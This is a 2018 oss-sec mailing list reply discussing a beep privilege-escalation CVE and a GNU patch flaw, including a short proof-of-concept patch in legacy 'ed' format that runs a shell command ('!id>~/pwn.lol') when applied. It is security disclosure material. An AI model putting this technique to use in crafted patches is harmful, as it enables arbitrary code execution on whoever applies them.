oss-sec mailing list archives

Re: Privsec vuln in beep / Code execution in GNU patch

From: Jakub Wilk <jwilk () jwilk net>
Date: Fri, 6 Apr 2018 11:51:40 +0200

* Hanno Böck <hanno () hboeck de>, 2018-04-06, 08:52:

There was a joke webpage about a vulnerability in beep a few days ago:
http://holeybeep.ninja/
There's also a corresponding Debian Advisory:
https://lists.debian.org/debian-security-announce/2018/msg00089.html
Neither have any technical details. CVE is CVE-2018-0492.

If anyone knows the background of this please share it.


Upstream bug report:
https://github.com/johnath/beep/issues/11

GNU patch supports a legacy "ed" format for patches and that allowsexecuting external commands.

[...]

--- a   2018-13-37 13:37:37.000000000 +0100
+++ b   2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!id>~/pwn.lol

This bug triggers even with -u (which is supposed to disable patch typedetection). :-/


--
Jakub Wilk

Current thread:

Privsec vuln in beep / Code execution in GNU patch Hanno Böck (Apr 05)
- Re: Privsec vuln in beep / Code execution in GNU patch Sebastian Krahmer (Apr 06)
- Re: Privsec vuln in beep / Code execution in GNU patch Jakub Wilk (Apr 06)